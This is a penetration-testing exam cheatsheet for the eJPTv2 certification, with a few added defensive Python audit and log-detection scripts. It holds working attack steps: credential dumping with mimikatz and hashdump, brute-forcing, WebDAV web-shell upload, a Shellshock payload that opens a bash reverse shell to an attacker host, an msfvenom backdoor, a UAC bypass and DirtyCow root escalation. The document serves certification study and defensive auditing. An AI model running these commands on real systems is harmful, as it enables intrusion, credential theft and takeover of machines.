eJPTv2 Exam Cheatsheet
Linux:
uname -a (kernel, OS, hostname, processor)
cat /etc/issue (distro + version)
cat /etc/*release (distro + version, codename in parentheses)
env (to view environment variables)
lscpu (CPU info)
free -h (RAM usage)
df -h (list of disks and mounted filesystems)
df -ht ext4 (only lists ext4 filesystems)
lsblk | grep sd (list disks, filtered by the "sd" device-name prefix)
dpkg -l (list the packages installed on Debian and their versions)
Meterpreter:
getuid (to see the current user)
sysinfo (hostname, OS and service pack, architecture, system language and domain or hostname; on Linux: distro + release version, kernel and arch)
C:\Windows\system32\eula.txt (OS info, build number, service pack)
show_mount (to show all mounted drives)
Windows cmd:
hostname (PC name)
systeminfo (hostname, OS name, OS version, OS manufacturer, OS configuration, processor, Windows directory, system directory, boot device, keyboard and system languages, total physical memory (RAM), domain, logon server, hotfixes/updates, network card, Hyper-V)
wmic qfe get Caption,Description,HotFixID,InstalledOn (additional information about hotfixes/updates; important to check which security updates relevant to privilege escalation are installed)
Meterpreter:
getuid (current user, or the user ID and group ID of the local user)
getprivs (current user privileges)
search logged_on (all information about currently and recently logged-in users and their SIDs)
Linux:
whoami (current user)
groups (to view the current user's groups)
groups xuser (to see the groups of user xuser)
cat /etc/passwd (to see the system accounts; the user accounts at the end have a shell, "/bin/sh" or "/bin/bash")
last (last users legitimately logged into the system)
lastlog (most recent login of every user [SSH or local])
Windows cmd:
whoami (current user)
whoami /priv (current user privileges)
query user (logged-in users)
net users (all user accounts)
net user x (info on user x)
net localgroup (all groups on the system)
net localgroup xgroup (to see the members of group xgroup)
Meterpreter:
hashdump (Windows: pgrep lsass -> migrate <lsass PID> -> hashdump)
kiwi (load kiwi) -> help or ? -> creds_all (dump all hashed credentials) -> lsa_dump_sam (dumps the NTLM hashes of all users) -> lsa_dump_secrets (sometimes dumps credentials in plain text) -> password_change (to change the password or hash of a user)
Linux:
cat /etc/shadow (requires privileges)
$1$ -> MD5
$2$ -> Blowfish
$5$ -> SHA-256
$6$ -> SHA-512
search hashdump (post/linux/gather/hashdump)
Crack SHA-512: john --format=sha512crypt file.txt --wordlist=/absolute/path
hashcat -m 1800 -a 0 (or -a 3) file.txt /path/to/wordlist
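The prefix table above can be applied automatically when reviewing a system's shadow file. The following script is an added example (not from the cheatsheet): it parses /etc/shadow-style lines from a constructed sample, classifies each account by its crypt(5) prefix, and flags accounts that still use a fast MD5 or DES hash or have an empty password; yescrypt ($y$) and the bcrypt variants of $2$ are handled in addition to the four prefixes listed.

```python
import re

# crypt(5) prefixes from the cheatsheet, plus $y$ (yescrypt, the current Debian/Ubuntu default)
SHADOW_ALGOS = {"$1$": "MD5", "$5$": "SHA-256", "$6$": "SHA-512", "$y$": "yescrypt"}
BCRYPT_RE = re.compile(r"^\$2[abxy]?\$")  # $2$ Blowfish and its $2a$/$2b$/$2y$ variants
WEAK_ALGOS = {"MD5", "DES"}               # fast hashes: flag them for re-hashing

def classify_hash(field):
    """Return (algorithm, status) for one password field of an /etc/shadow line."""
    if field == "":
        return ("none", "empty password")
    if field.startswith(("!", "*")):
        return ("none", "locked")
    for prefix, algo in SHADOW_ALGOS.items():
        if field.startswith(prefix):
            return (algo, "weak" if algo in WEAK_ALGOS else "ok")
    if BCRYPT_RE.match(field):
        return ("Blowfish", "ok")
    if len(field) == 13 and "$" not in field:  # legacy DES crypt: 2-char salt + 11 chars
        return ("DES", "weak")
    return ("unknown", "review")

def audit_shadow(text):
    """Parse shadow-formatted text and return {user: (algorithm, status)}."""
    report = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) < 2 or not parts[0]:
            continue
        report[parts[0]] = classify_hash(parts[1])
    return report

def accounts_to_fix(report):
    """Users whose hash is weak or whose password is empty, sorted by name."""
    return sorted(user for user, (_, status) in report.items()
                  if status in ("weak", "empty password"))

# Constructed sample; the hash bodies are made-up characters, not real hashes.
SAMPLE_SHADOW = """\
root:$6$Zq3saltXX$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123:19700:0:99999:7:::
legacy:$1$ab12cd34$0123456789abcdefghijkl:18000:0:99999:7:::
svc-backup:!:19700:0:99999:7:::
guest::19700:0:99999:7:::
"""
```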
Windows cmd:
mimikatz -> help or ? -> privilege::debug (should answer Privilege '20' OK) -> lsadump::sam (we get the syskey, the SAM key and the RIDs [500 = Administrator]) -> lsadump::secrets -> sekurlsa::logonpasswords (to get clear-text passwords if they are in use and/or available)
Crack NTLM: john --format=NT file.txt --wordlist=/absolute/path
hashcat -m 1000 -a 0 (or -a 3) file.txt /path/to/wordlist
In each dumped line the first hash is the LM hash and the second is the NTLM hash.
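To turn the LM/NTLM layout into an account audit, here is an added example (not part of the cheatsheet) that parses the user:RID:LM:NT::: dump format over a constructed sample and flags accounts where an LM hash is still stored, where the NT hash is the empty-password hash, or which are the built-in Administrator (RID 500).

```python
import re

# Hashes of the empty password: a blank LM hash means LM storage is disabled (the
# normal state on modern Windows); a blank NT hash means the account has no password.
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

def parse_pwdump_line(line):
    """Parse one 'user:RID:LM:NT:::' line (hashdump/pwdump format) or return None."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        return None
    user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if not (rid.isdigit() and HEX32.match(lm) and HEX32.match(nt)):
        return None
    return {"user": user, "rid": int(rid), "lm": lm, "nt": nt}

def audit_pwdump(text):
    """Return {user: [findings]} for every account that needs attention."""
    report = {}
    for line in text.splitlines():
        entry = parse_pwdump_line(line)
        if entry is None:
            continue
        flags = []
        if entry["lm"] != BLANK_LM:
            flags.append("LM hash stored")  # LM is trivially crackable; disable its storage
        if entry["nt"] == BLANK_NT:
            flags.append("empty password")
        if entry["rid"] == 500:
            flags.append("built-in Administrator (RID 500)")
        if flags:
            report[entry["user"]] = flags
    return report

# Constructed sample dump; the non-blank hash bodies are made-up hex, not real hashes.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacyuser:1001:fedcba9876543210fedcba9876543210:0123456789abcdef0123456789abcdef:::
alice:1002:aad3b435b51404eeaad3b435b51404ee:abcdefabcdefabcdefabcdefabcdef01:::
"""
```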
Linux:
ifconfig (network cards, MAC + IP + network segment)
ip a (MAC, IP + network segment)
cat /etc/networks (interfaces and their configuration)
cat /etc/hosts (hosts + local domains)
cat /etc/resolv.conf (default DNS server)
arp (hosts connected to the network)
Windows cmd:
ipconfig (network adapters, DNS suffix, IPv4 and IPv6 addresses, netmask and gateway)
ipconfig /all (hostname, IP routing enabled, MAC address, DHCP enabled [dynamic IPs], lease expiry, DHCP server, gateway, DNS server)
route print (routing table)
arp -a (all devices on the network, IP and MAC)
netstat -ano (protocols and ports of the services [0.0.0.0 entries are the host's own listeners])
netsh firewall show state (firewall status)
netsh advfirewall firewall dump (dump the firewall configuration file)
netsh advfirewall show allprofiles (whether the firewall is active or not)
EXTRA:
SMB enum:
1. NMAP SCRIPTS:
nmap --script smb-server-stats --script-args smbusername=administrator,smbpassword=passwordadmin IP (to see how much data has been sent and received, how many logins have failed, permission errors, system errors, print jobs, open files)
nmap --script smb-enum-domains --script-args smbusername=administrator,smbpassword=passwordadmin IP (to view users, password info, complexity requirements, and everything that applies to groups)
nmap --script smb-enum-groups --script-args smbusername=administrator,smbpassword=passwordadmin IP (divides users into their groups)
nmap --script smb-enum-services --script-args smbusername=administrator,smbpassword=passwordadmin IP (lists the services in use and their details)
nmap --script smb-enum-shares,smb-ls --script-args smbusername=administrator,smbpassword=passwordadmin IP (lists the shares and the contents of those directories [ls])
2. smbmap
3. nmblookup
nmblookup -h
nmblookup -A IPobj (shows the registered NetBIOS names and their service type [the <number> suffix]; a <20> means we can connect to the server)
4. Metasploit enum
SMB 1: use auxiliary/scanner/smb/smb_version (Windows and Samba version)
SMB 2: use auxiliary/scanner/smb/smb2 (to see if it supports SMB2)
SMB 3: use auxiliary/scanner/smb/smb_enumshares (enumerates shares and which are readable and writable, share types, directories, files, timestamps, etc.)
5. enum4linux
enum4linux -h
enum4linux -S IPobj (list of users, workgroup name, whether null sessions are allowed, the domain SID and OS info)
6. CONNECTION TO SMB
smbclient -h
rpcclient -h
SSH:
Now we can attempt to SSH into the main server. Before that, check the id_rsa.pub file to find the username at the end of the file.
ssh user@IPobj
Quick troubleshooting:
ssh -i id_rsa user@IPobj
HTTP:
http IPobj (makes a request to the web page and prints the headers; here you may spot a vulnerable file being executed)
nmap scripts:
MySQL:
Connection to MySQL:
show databases; -> use xdatabase; -> select count(*) from xtable; (shows how many rows xtable has) -> select * from xtable; (to see everything in xtable) -> help (to see the options)
Metasploit:
nmap scripts:
nmap --script=mysql-users --script-args="mysqluser='root',mysqlpass=''" IPobj (lists the users of the target PC)
nmap --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''" IPobj (lists the databases of the server/PC)
nmap --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''" IPobj (prints the MySQL variables; datadir tells you where the data is stored on the PC)
nmap --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename=/usr/share/nmap/nselib/data/mysql-cis.audit" IPobj (audits the MySQL configuration; in this case "does not grant privileges to non-admin users" = PASS)
nmap --script=mysql-dump-hashes --script-args="mysqluser='root',mysqlpass=''" IPobj (shows the password hashes of the users of the target PC)
nmap scripts:
nmap --script ms-sql-info IPobj (service info)
nmap --script ms-sql-brute --script-args userdb=/common_users.txt,passdb=/100-common-passwords.txt IPobj (note the users and passwords found)
nmap --script ms-sql-query --script-args mssql.username=admin,mssql.password=pass,ms-sql-query.query="SELECT * FROM master..syslogins" IPobj -oN output.txt (run queries with the obtained user credentials)
nmap --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=pass IPobj (to dump the PC accounts and their hashes)
nmap --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell.cmd='ipconfig' IPobj (try remote command execution)
nmap --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell.cmd="type C:\flag.txt" IPobj (the same, but to read text files such as flags)
Metasploit:
search mssql_login -> configure options -> set verbose false -> run (this finds users and passwords by brute force)
Exploitation:
Windows:
Microsoft IIS + WebDAV: (port 80/443)
Can run .asp, .aspx, .config and .php files
davtest (used to scan, authenticate against and exploit a WebDAV server)
davtest -url http://IPobj/webdav (checks that it exists, without using credentials)
davtest -auth user:pass -url http://IPobj/webdav (this tells you which file types we can upload and execute)
cadaver (allows uploading and downloading files, on-screen display, in-place editing, moving, copying, creating and deleting collections, manipulating ownership and locking resources on WebDAV servers)
cadaver --help
cadaver http://IPobj/webdav (and enter credentials); in another terminal: ls -al /usr/share/webshells (asp in this case); then in cadaver: put /usr/share/webshells/asp/webshell.asp (configure it if necessary)
We return to the web browser, open the uploaded file and obtain the web shell, where we can execute commands.
EternalBlue (MS17-010, CVE-2017-0144): you already know how to exploit it.
BlueKeep: CVE-2019-0708
Exploitation (WinRM):
METASPLOIT:
search winrm_script_exec -> use 0 -> show options (and configure) -> set force_vbs true -> set username and password -> exploit (it may not work the first time; try several times)
Linux:
Shellshock: (CVE-2014-6271)
The Shellshock vulnerability is a bug in bash that makes it mistakenly execute the commands that follow the character sequence () { :;}; in an environment variable.
Apache servers configured to run .cgi or .sh scripts are vulnerable to this attack.
To exploit this vulnerability, a script that passes request data to bash must be located.
In the context of an Apache web server we can use any .cgi script accessible from the web server.
Shellshock exploitation:
We connect from the web browser to the Apache server's web page.
We view the source code: in the <script> part we see that it executes a .cgi file, which is saved in the server's root folder and is accessible; we access the script's URL, e.g. IPobj/gettime.cgi
We check whether it is vulnerable with: nmap -sV IPobj --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" (reports whether it is vulnerable)
Manual exploitation:
With Burp Suite we intercept the page IPobj/script.cgi -> right click -> send to Repeater -> we replace the User-Agent with: () { :;}; echo; echo; /bin/bash -c 'cat /etc/passwd' -> send, and the response contains the output of the executed command
Manual reverse shell:
nc -nlvp port
We return to Burp Suite Repeater and change the User-Agent to: () { :;}; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/IPkali/LPORT 0>&1' and we have the reverse shell
Metasploit:
search shellshock -> use 5 (exploit/multi/http/apache_mod_cgi_bash_env_exec) -> show options -> set targeturi script.cgi -> exploit
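From the defender's side, the same () { :;}; trigger is easy to spot in web server logs, because CGI hands the User-Agent and Referer headers to bash as environment variables. The following is an added example, not part of the cheatsheet: it scans Apache combined-format access log lines (a constructed sample) for the trigger in those two headers, URL-decoding them first so that an encoded probe is not missed.

```python
import re
from urllib.parse import unquote

# The bash function-definition prefix that triggers Shellshock (CVE-2014-6271),
# matched loosely so whitespace variants such as "(){:;};" are caught too.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{\s*:\s*;\s*\}\s*;")

# Apache "combined" log line: host ident user [timestamp] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def is_shellshock_probe(value):
    """True if a header value carries the trigger, whether raw or URL-encoded."""
    return bool(SHELLSHOCK_RE.search(unquote(value)))

def scan_access_log(text):
    """Return (ip, path, header, decoded_value) for every line carrying the trigger."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # CGI exports these as HTTP_USER_AGENT / HTTP_REFERER, so they are the usual carriers.
        for header in ("ua", "referer"):
            if is_shellshock_probe(m.group(header)):
                findings.append((m.group("ip"), m.group("path"), header, unquote(m.group(header))))
    return findings

# Constructed sample log (not from a real server). The third line hides the trigger
# behind URL encoding, which a naive substring match on "() {" would miss.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /gettime.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /gettime.cgi HTTP/1.1" 200 1043 "-" "() { :;}; echo; echo; /bin/bash -c 'id'"
10.0.0.9 - - [10/Oct/2023:13:56:07 +0000] "GET /gettime.cgi HTTP/1.1" 500 0 "%28%29%20%7B%20%3A%3B%7D%3B%20/bin/bash%20-c%20id" "curl/7.88.1"
"""
```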
Privilege Escalation:
Windows:
Kernel exploit:
After getting meterpreter and not being able to run getsystem:
search suggester (this post-exploitation module shows the vulnerabilities and the Metasploit modules that can be used to elevate privileges) -> select the one you want, configure it and launch it
Manual:
Go back to meterpreter -> shell -> systeminfo -> copy the output to a text file -> Ctrl+C to go back to meterpreter -> open another terminal and create a text file with nano and paste the previous information. We look for the windows-exploit-suggester folder -> we run the Python script with --update -> then ./windows-exploit-suggester.py --database <the database file just created> --systeminfo <the text file above> (the exploits listed nearest the top are the most likely to work)
Go back to the unprivileged meterpreter session and go to the Temp folder -> upload /path/to/chosen/exploit -> shell -> .\exploit.exe 7 (where 7 is the OS version, Windows 7) -> we get a new shell with full privileges.
UAC bypass with UACme:
See the UACme GitHub repo to choose the technique suited to the OS:
We have access to a Windows machine with a user account from the local Administrators group -> cmd -> net users (the current account is IEUser) -> net localgroup administrators -> opening cmd as admin bypasses UAC.
In meterpreter:
sysinfo (write it down) -> pgrep explorer -> migrate <explorer PID> -> getuid (we are a user of the admin group) -> getprivs (has few privileges) -> shell -> net user -> net localgroup administrators -> net user admin password123 (access denied = UAC). We go to the UACme repo on GitHub and download the appropriate version -> msfvenom -p windows/meterpreter/reverse_tcp LHOST=ipkali LPORT=availableport -f exe > backdoor.exe. We open another msfconsole and use multi/handler (configure it the same as the msfvenom payload) -> run
We return to the admin meterpreter session -> go to Temp and, if it does not exist in the root folder, create it with mkdir -> upload backdoor.exe -> upload /root/Desktop/tools/UACME/Akagi64.exe (the UACme binary chosen from the repo according to the OS) -> shell -> dir -> .\Akagi64.exe 23 C:\Temp\backdoor.exe (and in the multi/handler we should now have a privileged session)
Linux:
Kernel exploit:
We need to know the kernel version.
Metasploit meterpreter + Linux Exploit Suggester: sysinfo (OS + version + kernel); getuid (we are an unprivileged user [even a service account like www-data is enough])
cd /tmp -> upload ~/Desktop/Linux-Enum/les.sh -> chmod +x les.sh -> ./les.sh (lists vulnerabilities and exploits; also reports the architecture and kernel version) -> we download DirtyCow from exploit-db.com (it is written in C) -> mv 40839.c dirty.c (we rename it) -> gcc -pthread dirty.c -o dirty -lcrypt (we follow the compilation instructions included in the exploit) -> we go back to meterpreter and upload ~/Downloads/dirty (we upload the compiled executable) -> /bin/bash -i -> chmod +x dirty -> ./dirty (enter a password if you want) -> it gives an error because it was not compiled on the target machine -> I go back to meterpreter -> shell -> /bin/bash -i -> gcc -pthread dirty.c -o dirty -lcrypt -> chmod +x dirty -> ./dirty password123 (creates a firefart user who is root and backs up /etc/passwd before creating it; now we have a firefart user with the password password123) -> su firefart (it does not work here, but it also works over SSH) -> ssh firefart@IPobj (do what it asks and then log in) -> being root we can cat /etc/shadow to see the hashes of the user passwords.
With Nikto:
Nikto web app vulnerability scan tutorial
Windows:
x64:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe (compile the exploit to a Windows portable executable)
If it gives an error, type the compiler name followed by a dash and press Tab to see the available arguments
x32:
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
Linux:
use gcc directly
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://www.revshells.com/